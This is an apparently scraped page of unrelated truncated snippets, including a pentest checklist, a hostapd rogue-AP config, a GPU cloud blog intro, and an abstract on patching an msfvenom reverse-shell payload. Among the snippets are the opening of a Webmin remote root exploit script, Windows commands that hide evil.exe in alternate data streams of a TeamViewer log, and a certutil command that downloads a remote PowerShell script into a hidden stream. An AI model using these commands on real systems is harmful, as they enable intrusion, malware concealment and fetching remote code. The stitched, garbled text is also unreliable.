- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
interface=wlan0 | |
# -------------------------------------- | |
bss=wlan1 | |
ssid=EAP | |
# IEEE 802.11 specifies two authentication algorithms. hostapd can be | |
# configured to allow both of these or only one. Open system authentication | |
# should be used with IEEE 802.1X. | |
# Bit fields of allowed authentication algorithms: | |
# bit 0 = Open System Authentication |
In February 2017, Google announced the availability GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.
Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE)
within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
HOST=$1; | |
PORT=$2; | |
LHOST=$3; | |
LPORT=$4; | |
if [ $# -lt 4 ] | |
then | |
echo "Webmin <1.29 remote root exploit by oxagast" | |
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE."; | |
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!"; | |
echo "Usage:" |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
#!/bin/bash | |
# Usage : ./scanio.sh <save file> | |
# Example: ./scanio.sh cname_list.txt | |
# Premium | |
function ech() { | |
spinner=( "|" "/" "-" "\\" ) | |
while true; do | |
for i in ${spinner[@]}; do | |
echo -ne "\r[$i] $1" |